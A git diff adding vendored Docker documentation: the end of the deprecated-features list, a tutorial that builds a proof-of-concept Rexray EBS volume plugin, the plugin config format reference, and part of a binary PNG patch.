[Feature Deprecation Policy](https://docs.docker.com/engine/#feature-deprecation-policy). + + +### Top-level network properties in NetworkSettings + +**Deprecated In Release: v1.13.0** + +**Target For Removal In Release: v1.16** + +When inspecting a container, `NetworkSettings` contains top-level information +about the default ("bridge") network: + +`EndpointID`, `Gateway`, `GlobalIPv6Address`, `GlobalIPv6PrefixLen`, `IPAddress`, +`IPPrefixLen`, `IPv6Gateway`, and `MacAddress`. 
+ +These properties are deprecated in favor of per-network properties in +`NetworkSettings.Networks`. These properties were already "deprecated" in +docker 1.9, but kept around for backward compatibility. + +Refer to [#17538](https://github.com/docker/docker/pull/17538) for further +information. + +## `filter` param for `/images/json` endpoint +**Deprecated In Release: [v1.13.0](https://github.com/docker/docker/releases/tag/v1.13.0)** + +**Target For Removal In Release: v1.16** + +The `filter` param to filter the list of images by reference (name or name:tag) is now implemented as a regular filter, named `reference`. + +### `repository:shortid` image references +**Deprecated In Release: [v1.13.0](https://github.com/docker/docker/releases/tag/v1.13.0)** + +**Target For Removal In Release: v1.16** + +`repository:shortid` syntax for referencing images is very little used, collides with tag references and can be confused with digest references. + +### `docker daemon` subcommand +**Deprecated In Release: [v1.13.0](https://github.com/docker/docker/releases/tag/v1.13.0)** + +**Target For Removal In Release: v1.16** + +The daemon is moved to a separate binary (`dockerd`), and should be used instead. + +### Duplicate keys with conflicting values in engine labels +**Deprecated In Release: [v1.13.0](https://github.com/docker/docker/releases/tag/v1.13.0)** + +**Target For Removal In Release: v1.16** + +Duplicate keys with conflicting values have been deprecated. A warning is displayed +in the output, and an error will be returned in the future. + +### `MAINTAINER` in Dockerfile +**Deprecated In Release: [v1.13.0](https://github.com/docker/docker/releases/tag/v1.13.0)** + +`MAINTAINER` was an early very limited form of `LABEL` which should be used instead. 
+ +### API calls without a version +**Deprecated In Release: [v1.13.0](https://github.com/docker/docker/releases/tag/v1.13.0)** + +**Target For Removal In Release: v1.16** + +API versions should be supplied to all API calls to ensure compatibility with +future Engine versions. Instead of just requesting, for example, the URL +`/containers/json`, you must now request `/v1.25/containers/json`. + +### Backing filesystem without `d_type` support for overlay/overlay2 +**Deprecated In Release: [v1.13.0](https://github.com/docker/docker/releases/tag/v1.13.0)** + +**Target For Removal In Release: v1.16** + +The overlay and overlay2 storage drivers do not work as expected if the backing +filesystem does not support `d_type`. For example, XFS does not support `d_type` +if it is formatted with the `ftype=0` option. + +Please also refer to [#27358](https://github.com/docker/docker/issues/27358) for +further information. + +### Three arguments form in `docker import` +**Deprecated In Release: [v0.6.7](https://github.com/docker/docker/releases/tag/v0.6.7)** + +**Removed In Release: [v1.12.0](https://github.com/docker/docker/releases/tag/v1.12.0)** + +The `docker import` command format `file|URL|- [REPOSITORY [TAG]]` is deprecated since November 2013. It is no longer supported. + +### `-h` shorthand for `--help` + +**Deprecated In Release: [v1.12.0](https://github.com/docker/docker/releases/tag/v1.12.0)** + +**Target For Removal In Release: v1.15** + +The shorthand (`-h`) is less common than `--help` on Linux and cannot be used +on all subcommands (due to it conflicting with, e.g. `-h` / `--hostname` on +`docker create`). For this reason, the `-h` shorthand was not printed in the +"usage" output of subcommands, nor documented, and is now marked "deprecated". 
+ +### `-e` and `--email` flags on `docker login` +**Deprecated In Release: [v1.11.0](https://github.com/docker/docker/releases/tag/v1.11.0)** + +**Target For Removal In Release: v1.14** + +The docker login command is removing the ability to automatically register for an account with the target registry if the given username doesn't exist. Due to this change, the email flag is no longer required, and will be deprecated. + +### Separator (`:`) of `--security-opt` flag on `docker run` +**Deprecated In Release: [v1.11.0](https://github.com/docker/docker/releases/tag/v1.11.0)** + +**Target For Removal In Release: v1.14** + +The flag `--security-opt` doesn't use the colon separator (`:`) anymore to divide keys and values, it uses the equal symbol (`=`) for consistency with other similar flags, like `--storage-opt`. + +### `/containers/(id or name)/copy` endpoint + +**Deprecated In Release: [v1.8.0](https://github.com/docker/docker/releases/tag/v1.8.0)** + +**Removed In Release: [v1.12.0](https://github.com/docker/docker/releases/tag/v1.12.0)** + +The endpoint `/containers/(id or name)/copy` is deprecated in favor of `/containers/(id or name)/archive`. + +### Ambiguous event fields in API +**Deprecated In Release: [v1.10.0](https://github.com/docker/docker/releases/tag/v1.10.0)** + +The fields `ID`, `Status` and `From` in the events API have been deprecated in favor of a richer structure. +See the events API documentation for the new format. + +### `-f` flag on `docker tag` +**Deprecated In Release: [v1.10.0](https://github.com/docker/docker/releases/tag/v1.10.0)** + +**Removed In Release: [v1.12.0](https://github.com/docker/docker/releases/tag/v1.12.0)** + +To make tagging consistent across the various `docker` commands, the `-f` flag on the `docker tag` command is deprecated. It is no longer necessary to specify `-f` to move a tag from one image to another. Nor will `docker` generate an error if the `-f` flag is missing and the specified tag is already in use. 
+ +### HostConfig at API container start +**Deprecated In Release: [v1.10.0](https://github.com/docker/docker/releases/tag/v1.10.0)** + +**Removed In Release: [v1.12.0](https://github.com/docker/docker/releases/tag/v1.12.0)** + +Passing an `HostConfig` to `POST /containers/{name}/start` is deprecated in favor of +defining it at container creation (`POST /containers/create`). + +### `--before` and `--since` flags on `docker ps` + +**Deprecated In Release: [v1.10.0](https://github.com/docker/docker/releases/tag/v1.10.0)** + +**Removed In Release: [v1.12.0](https://github.com/docker/docker/releases/tag/v1.12.0)** + +The `docker ps --before` and `docker ps --since` options are deprecated. +Use `docker ps --filter=before=...` and `docker ps --filter=since=...` instead. + +### `--automated` and `--stars` flags on `docker search` + +**Deprecated in Release: [v1.12.0](https://github.com/docker/docker/releases/tag/v1.12.0)** + +**Target For Removal In Release: v1.15** + +The `docker search --automated` and `docker search --stars` options are deprecated. +Use `docker search --filter=is-automated=...` and `docker search --filter=stars=...` instead. + +### Driver Specific Log Tags +**Deprecated In Release: [v1.9.0](https://github.com/docker/docker/releases/tag/v1.9.0)** + +**Removed In Release: [v1.12.0](https://github.com/docker/docker/releases/tag/v1.12.0)** + +Log tags are now generated in a standard way across different logging drivers. +Because of which, the driver specific log tag options `syslog-tag`, `gelf-tag` and +`fluentd-tag` have been deprecated in favor of the generic `tag` option. + + docker --log-driver=syslog --log-opt tag="{{.ImageName}}/{{.Name}}/{{.ID}}" + +### LXC built-in exec driver +**Deprecated In Release: [v1.8.0](https://github.com/docker/docker/releases/tag/v1.8.0)** + +**Removed In Release: [v1.10.0](https://github.com/docker/docker/releases/tag/v1.10.0)** + +The built-in LXC execution driver, the lxc-conf flag, and API fields have been removed. 
+ +### Old Command Line Options +**Deprecated In Release: [v1.8.0](https://github.com/docker/docker/releases/tag/v1.8.0)** + +**Removed In Release: [v1.10.0](https://github.com/docker/docker/releases/tag/v1.10.0)** + +The flags `-d` and `--daemon` are deprecated in favor of the `daemon` subcommand: + + docker daemon -H ... + +The following single-dash (`-opt`) variant of certain command line options +are deprecated and replaced with double-dash options (`--opt`): + + docker attach -nostdin + docker attach -sig-proxy + docker build -no-cache + docker build -rm + docker commit -author + docker commit -run + docker events -since + docker history -notrunc + docker images -notrunc + docker inspect -format + docker ps -beforeId + docker ps -notrunc + docker ps -sinceId + docker rm -link + docker run -cidfile + docker run -dns + docker run -entrypoint + docker run -expose + docker run -link + docker run -lxc-conf + docker run -n + docker run -privileged + docker run -volumes-from + docker search -notrunc + docker search -stars + docker search -t + docker search -trusted + docker tag -force + +The following double-dash options are deprecated and have no replacement: + + docker run --cpuset + docker run --networking + docker ps --since-id + docker ps --before-id + docker search --trusted + +**Deprecated In Release: [v1.5.0](https://github.com/docker/docker/releases/tag/v1.5.0)** + +**Removed In Release: [v1.12.0](https://github.com/docker/docker/releases/tag/v1.12.0)** + +The single-dash (`-help`) was removed, in favor of the double-dash `--help` + + docker -help + docker [COMMAND] -help + +### `--run` flag on docker commit + +**Deprecated In Release: [v0.10.0](https://github.com/docker/docker/releases/tag/v0.10.0)** + +**Removed In Release: [v1.13.0](https://github.com/docker/docker/releases/tag/v1.13.0)** + +The flag `--run` of the docker commit (and its short version `-run`) were deprecated in favor +of the `--changes` flag that allows to pass `Dockerfile` commands. 
+ + +### Interacting with V1 registries + +**Disabled By Default In Release: v1.14** + +**Target For Removal In Release: v1.17** + +Version 1.9 adds a flag (`--disable-legacy-registry=false`) which prevents the +docker daemon from `pull`, `push`, and `login` operations against v1 +registries. Though enabled by default, this signals the intent to deprecate +the v1 protocol. + +Support for the v1 protocol to the public registry was removed in 1.13. Any +mirror configurations using v1 should be updated to use a +[v2 registry mirror](https://docs.docker.com/registry/recipes/mirror/). + +### Docker Content Trust ENV passphrase variables name change +**Deprecated In Release: [v1.9.0](https://github.com/docker/docker/releases/tag/v1.9.0)** + +**Removed In Release: [v1.12.0](https://github.com/docker/docker/releases/tag/v1.12.0)** + +Since 1.9, Docker Content Trust Offline key has been renamed to Root key and the Tagging key has been renamed to Repository key. Due to this renaming, we're also changing the corresponding environment variables + +- DOCKER_CONTENT_TRUST_OFFLINE_PASSPHRASE is now named DOCKER_CONTENT_TRUST_ROOT_PASSPHRASE +- DOCKER_CONTENT_TRUST_TAGGING_PASSPHRASE is now named DOCKER_CONTENT_TRUST_REPOSITORY_PASSPHRASE diff --git a/vendor/github.com/docker/docker/docs/extend/EBS_volume.md b/vendor/github.com/docker/docker/docs/extend/EBS_volume.md new file mode 100644 index 0000000000..8c64efa164 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/extend/EBS_volume.md @@ -0,0 +1,164 @@ +--- +description: Volume plugin for Amazon EBS +keywords: "API, Usage, plugins, documentation, developer, amazon, ebs, rexray, volume" +title: Volume plugin for Amazon EBS +--- + + + +# A proof-of-concept Rexray plugin + +In this example, a simple Rexray plugin will be created for the purposes of using +it on an Amazon EC2 instance with EBS. It is not meant to be a complete Rexray plugin. 
+ +The example source is available at [https://github.com/tiborvass/rexray-plugin](https://github.com/tiborvass/rexray-plugin). + +To learn more about Rexray: [https://github.com/codedellemc/rexray](https://github.com/codedellemc/rexray) + +## 1. Make a Docker image + +The following is the Dockerfile used to containerize rexray. + +```Dockerfile +FROM debian:jessie +RUN apt-get update && apt-get install -y --no-install-recommends wget ca-certificates +RUN wget https://dl.bintray.com/emccode/rexray/stable/0.6.4/rexray-Linux-x86_64-0.6.4.tar.gz -O rexray.tar.gz && tar -xvzf rexray.tar.gz -C /usr/bin && rm rexray.tar.gz +RUN mkdir -p /run/docker/plugins /var/lib/libstorage/volumes +ENTRYPOINT ["rexray"] +CMD ["--help"] +``` + +To build it you can run `image=$(cat Dockerfile | docker build -q -)` and `$image` +will reference the containerized rexray image. + +## 2. Extract rootfs + +```sh +$ TMPDIR=/tmp/rexray # for the purpose of this example +$ # create container without running it, to extract the rootfs from image +$ docker create --name rexray "$image" +$ # save the rootfs to a tar archive +$ docker export -o $TMPDIR/rexray.tar rexray +$ # extract rootfs from tar archive to a rootfs folder +$ ( mkdir -p $TMPDIR/rootfs; cd $TMPDIR/rootfs; tar xf ../rexray.tar ) +``` + +## 3. 
Add plugin configuration + +We have to put the following JSON to `$TMPDIR/config.json`: + +```json +{ + "Args": { + "Description": "", + "Name": "", + "Settable": null, + "Value": null + }, + "Description": "A proof-of-concept EBS plugin (using rexray) for Docker", + "Documentation": "https://github.com/tiborvass/rexray-plugin", + "Entrypoint": [ + "/usr/bin/rexray", "service", "start", "-f" + ], + "Env": [ + { + "Description": "", + "Name": "REXRAY_SERVICE", + "Settable": [ + "value" + ], + "Value": "ebs" + }, + { + "Description": "", + "Name": "EBS_ACCESSKEY", + "Settable": [ + "value" + ], + "Value": "" + }, + { + "Description": "", + "Name": "EBS_SECRETKEY", + "Settable": [ + "value" + ], + "Value": "" + } + ], + "Interface": { + "Socket": "rexray.sock", + "Types": [ + "docker.volumedriver/1.0" + ] + }, + "Linux": { + "AllowAllDevices": true, + "Capabilities": ["CAP_SYS_ADMIN"], + "Devices": null + }, + "Mounts": [ + { + "Source": "/dev", + "Destination": "/dev", + "Type": "bind", + "Options": ["rbind"] + } + ], + "Network": { + "Type": "host" + }, + "PropagatedMount": "/var/lib/libstorage/volumes", + "User": {}, + "WorkDir": "" +} +``` + +Please note a couple of points: +- `PropagatedMount` is needed so that the docker daemon can see mounts done by the +rexray plugin from within the container, otherwise the docker daemon is not able +to mount a docker volume. +- The rexray plugin needs dynamic access to host devices. For that reason, we +have to give it access to all devices under `/dev` and set `AllowAllDevices` to +true for proper access. +- The user of this simple plugin can change only 3 settings: `REXRAY_SERVICE`, +`EBS_ACCESSKEY` and `EBS_SECRETKEY`. This is because of the reduced scope of this +plugin. Ideally other rexray parameters could also be set. + +## 4. Create plugin + +`docker plugin create tiborvass/rexray-plugin "$TMPDIR"` will create the plugin. 
+ +```sh +$ docker plugin ls +ID NAME DESCRIPTION ENABLED +2475a4bd0ca5 tiborvass/rexray-plugin:latest A rexray volume plugin for Docker false +``` + +## 5. Test plugin + +```sh +$ docker plugin set tiborvass/rexray-plugin EBS_ACCESSKEY=$AWS_ACCESSKEY EBS_SECRETKEY=$AWS_SECRETKEY` +$ docker plugin enable tiborvass/rexray-plugin +$ docker volume create -d tiborvass/rexray-plugin my-ebs-volume +$ docker volume ls +DRIVER VOLUME NAME +tiborvass/rexray-plugin:latest my-ebs-volume +$ docker run --rm -v my-ebs-volume:/volume busybox sh -c 'echo bye > /volume/hi' +$ docker run --rm -v my-ebs-volume:/volume busybox cat /volume/hi +bye +``` + +## 6. Push plugin + +First, ensure you are logged in with `docker login`. Then you can run: +`docker plugin push tiborvass/rexray-plugin` to push it like a regular docker +image to a registry, to make it available for others to install via +`docker plugin install tiborvass/rexray-plugin EBS_ACCESSKEY=$AWS_ACCESSKEY EBS_SECRETKEY=$AWS_SECRETKEY`. diff --git a/vendor/github.com/docker/docker/docs/extend/config.md b/vendor/github.com/docker/docker/docs/extend/config.md new file mode 100644 index 0000000000..096d2d0822 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/extend/config.md @@ -0,0 +1,225 @@ +--- +title: "Plugin config" +description: "How develop and use a plugin with the managed plugin system" +keywords: "API, Usage, plugins, documentation, developer" +--- + + + + +# Plugin Config Version 1 of Plugin V2 + +This document outlines the format of the V0 plugin configuration. The plugin +config described herein was introduced in the Docker daemon in the [v1.12.0 +release](https://github.com/docker/docker/commit/f37117045c5398fd3dca8016ea8ca0cb47e7312b). + +Plugin configs describe the various constituents of a docker plugin. 
Plugin +configs can be serialized to JSON format with the following media types: + +Config Type | Media Type +------------- | ------------- +config | "application/vnd.docker.plugin.v1+json" + + +## *Config* Field Descriptions + +Config provides the base accessible fields for working with V0 plugin format + in the registry. + +- **`description`** *string* + + description of the plugin + +- **`documentation`** *string* + + link to the documentation about the plugin + +- **`interface`** *PluginInterface* + + interface implemented by the plugins, struct consisting of the following fields + + - **`types`** *string array* + + types indicate what interface(s) the plugin currently implements. + + currently supported: + + - **docker.volumedriver/1.0** + + - **docker.authz/1.0** + + - **`socket`** *string* + + socket is the name of the socket the engine should use to communicate with the plugins. + the socket will be created in `/run/docker/plugins`. + + +- **`entrypoint`** *string array* + + entrypoint of the plugin, see [`ENTRYPOINT`](../reference/builder.md#entrypoint) + +- **`workdir`** *string* + + workdir of the plugin, see [`WORKDIR`](../reference/builder.md#workdir) + +- **`network`** *PluginNetwork* + + network of the plugin, struct consisting of the following fields + + - **`type`** *string* + + network type. + + currently supported: + + - **bridge** + - **host** + - **none** + +- **`mounts`** *PluginMount array* + + mount of the plugin, struct consisting of the following fields, see [`MOUNTS`](https://github.com/opencontainers/runtime-spec/blob/master/config.md#mounts) + + - **`name`** *string* + + name of the mount. + + - **`description`** *string* + + description of the mount. + + - **`source`** *string* + + source of the mount. + + - **`destination`** *string* + + destination of the mount. + + - **`type`** *string* + + mount type. + + - **`options`** *string array* + + options of the mount. 
+ +- **`propagatedMount`** *string* + + path to be mounted as rshared, so that mounts under that path are visible to docker. This is useful for volume plugins. + This path will be bind-mounted outside of the plugin rootfs so its contents + are preserved on upgrade. + +- **`env`** *PluginEnv array* + + env of the plugin, struct consisting of the following fields + + - **`name`** *string* + + name of the env. + + - **`description`** *string* + + description of the env. + + - **`value`** *string* + + value of the env. + +- **`args`** *PluginArgs* + + args of the plugin, struct consisting of the following fields + + - **`name`** *string* + + name of the args. + + - **`description`** *string* + + description of the args. + + - **`value`** *string array* + + values of the args. + +- **`linux`** *PluginLinux* + + - **`capabilities`** *string array* + + capabilities of the plugin (*Linux only*), see list [`here`](https://github.com/opencontainers/runc/blob/master/libcontainer/SPEC.md#security) + + - **`allowAllDevices`** *boolean* + + If `/dev` is bind mounted from the host, and allowAllDevices is set to true, the plugin will have `rwm` access to all devices on the host. + + - **`devices`** *PluginDevice array* + + device of the plugin, (*Linux only*), struct consisting of the following fields, see [`DEVICES`](https://github.com/opencontainers/runtime-spec/blob/master/config-linux.md#devices) + + - **`name`** *string* + + name of the device. + + - **`description`** *string* + + description of the device. + + - **`path`** *string* + + path of the device. 
+ +## Example Config + +*Example showing the 'tiborvass/sample-volume-plugin' plugin config.* + +```json +{ + "Args": { + "Description": "", + "Name": "", + "Settable": null, + "Value": null + }, + "Description": "A sample volume plugin for Docker", + "Documentation": "https://docs.docker.com/engine/extend/plugins/", + "Entrypoint": [ + "/usr/bin/sample-volume-plugin", + "/data" + ], + "Env": [ + { + "Description": "", + "Name": "DEBUG", + "Settable": [ + "value" + ], + "Value": "0" + } + ], + "Interface": { + "Socket": "plugin.sock", + "Types": [ + "docker.volumedriver/1.0" + ] + }, + "Linux": { + "Capabilities": null, + "AllowAllDevices": false, + "Devices": null + }, + "Mounts": null, + "Network": { + "Type": "" + }, + "PropagatedMount": "/data", + "User": {}, + "Workdir": "" +} +``` diff --git a/vendor/github.com/docker/docker/docs/extend/images/authz_additional_info.png b/vendor/github.com/docker/docker/docs/extend/images/authz_additional_info.png new file mode 100644 index 0000000000000000000000000000000000000000..1a6a6d01d2048fcb975b7d2b025cdfabd4c4f5f3 GIT binary patch literal 45916 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 
